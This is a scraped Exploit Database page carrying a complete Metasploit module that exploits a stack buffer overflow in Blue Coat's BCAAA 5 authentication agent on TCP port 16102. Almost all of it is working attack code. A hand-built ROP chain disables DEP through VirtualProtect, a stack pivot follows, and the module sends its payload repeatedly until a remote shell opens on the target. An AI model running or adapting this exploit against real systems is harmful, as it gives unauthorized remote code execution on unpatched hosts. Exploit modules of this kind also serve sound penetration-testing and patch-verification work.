Blue Coat Authentication and Authorization Agent (BCAAA) 5 – Remote Buffer Overflow (Metasploit)

• Exploit Database
• 135 阅读

• 作者： Metasploit
  日期： 2011-07-09
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17513/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143

  ## # $Id: bcaaa_bof.rb 13137 2011-07-09 04:10:52Z sinn3r $ ##   ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##   require &apos;msf/core&apos;   class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking   include Msf::Exploit::Remote::Tcp   def initialize(info={}) super(update_info(info, &apos;Name&apos; => "Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow", &apos;Description&apos;=> %q{ This module exploits a stack buffer overflow in process bcaaa-130.exe (port 16102), which comes as part of the Blue Coat Authentication proxy.Please note that by default, this exploit will attempt up to three times in order to successfully gain remote code execution (in some cases, it takes as many as five times).This can cause your activity to look even more suspicious.To modify the number of exploit attempts, set the ATTEMPTS option. }, &apos;License&apos;=> MSF_LICENSE, &apos;Version&apos;=> "$Revision: 13137 $", &apos;Author&apos; => [ &apos;Paul Harrington&apos;, # Initial discovery and PoC &apos;Travis Warren&apos;, # MSF Module with Universal DEP/ASLR bypass &apos;sinn3r&apos;,# More testing / reliability, plus minor changes ], &apos;References&apos; => [ [ &apos;URL&apos;, &apos;https://kb.bluecoat.com/index?page=content&id=SA55&apos; ], [ &apos;URL&apos;, &apos;http://seclists.org/bugtraq/2011/Jul/44&apos; ], ], &apos;Payload&apos;=> { &apos;Space&apos;=> 936, &apos;BadChars&apos; => "\x00", &apos;StackAdjustment&apos; => -3500, }, &apos;Platform&apos; => &apos;win&apos;, &apos;Targets&apos;=> [ [ &apos;BCAAA Version 5.4.6.1.54128&apos;, {} ], ], &apos;Privileged&apos; => false, &apos;DisclosureDate&apos; => "Apr 4 2011", &apos;DefaultTarget&apos;=> 0))   register_options( [ Opt::RPORT(16102), OptInt.new("ATTEMPTS", [true, "Number of attempts to try to exploit", 3]), ], self.class) end def junk return rand_text(4).unpack("L")[0].to_i end   def exploit   rop_gadgets = [ # rop chain generated with mona.py 0x7c346c0a,# POP EAX # RETN (MSVCR71.dll) 0x7c37a140,# Make EAX readable 0x7c37591f,# PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll) junk,# EBP (filler) 0x7c346c0a,# POP EAX # RETN (MSVCR71.dll) 0x7c37a140,# <- *&VirtualProtect() 0x7c3530ea,# MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll) 0x7c346c0b,# Slide, so next gadget would write to correct stack location 0x7c376069,# MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll) junk,# EDI (filler) junk,# will be patched at runtime (VP), then picked up into ESI junk,# EBX (filler) 0x7c376402,# POP EBP # RETN (msvcr71.dll) 0x7c345c30,# ptr to &apos;push esp #ret &apos; (from MSVCR71.dll) 0x7c346c0a,# POP EAX # RETN (MSVCR71.dll) 0xfffffdff,# size 0x00000201 -> ebx, modify if needed 0x7c351e05,# NEG EAX # RETN (MSVCR71.dll) 0x7c354901,# POP EBX # RETN (MSVCR71.dll) 0xffffffff,# pop value into ebx 0x7c345255,# INC EBX # FPATAN # RETN (MSVCR71.dll) 0x7c352174,# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll) 0x7c34d201,# POP ECX # RETN (MSVCR71.dll) 0x7c38b001,# RW pointer (lpOldProtect) (-> ecx) 0x7c34b8d7,# POP EDI # RETN (MSVCR71.dll) 0x7c34b8d8,# ROP NOP (-> edi) 0x7c344f87,# POP EDX # RETN (MSVCR71.dll) 0xffffffc0,# value to negate, target value : 0x00000040, target: edx 0x7c351eb1,# NEG EDX # RETN (MSVCR71.dll) 0x7c346c0a,# POP EAX # RETN (MSVCR71.dll) 0x90909090,# NOPS (-> eax) 0x7c378c81,# PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll) ].pack("V*")   pivot = [ 0x7C3410C4,# RETN (MSVCR71.dll) 0x1003800C,# PUSH ESP; POP EBX; POP EBP; RETN (SmAgentAPI.dll) 0x4241467D,# EBP 0x7C3C8937,# XCHG EAX,EBP; RETN (MSVCP71.dll) 0x7C3417D2,# SUB EAX,EAX; RETN (MSVCR71.dll) 0x7C3C8937,# XCHG EAX,EBP; RETN (MSVCP71.dll) 0x7C34f6C2,# MOV EAX, EBX; POP EBX; RETN (MSVCR71.dll) junk,# EBX 0x7C3C8937,# XCHG EAX,EBP; RETN (MSVCP71.dll) 0x5D02D0A0,# SUB EBP,EAX; RETN (MSVCR70.dll) 0x7C3C8937,# XCHG EAX,EBP; RETN (MSVCP71.dll) 0x7C3B5080,# XCHG EAX,ESP; RETN (MSVCP71.dll) ].pack("V*")   attempts = datastore[&apos;ATTEMPTS&apos;]   #Sometimes a few attempts are needed to get a shell back (3 or 5 times) attempts.times do |i| #If we have a session on the box already, then we don&apos;t continue trying break if session_created? buffer =rand_text(8) buffer << rop_gadgets buffer << payload.encoded buffer << &apos;EBAB&apos; buffer << rand_text(8) buffer << pivot   connect print_status("Sending request to #{rhost}. Attempt ##{(i+1).to_s}...") sock.put(buffer) handler select(nil, nil, nil, 2) disconnect end end end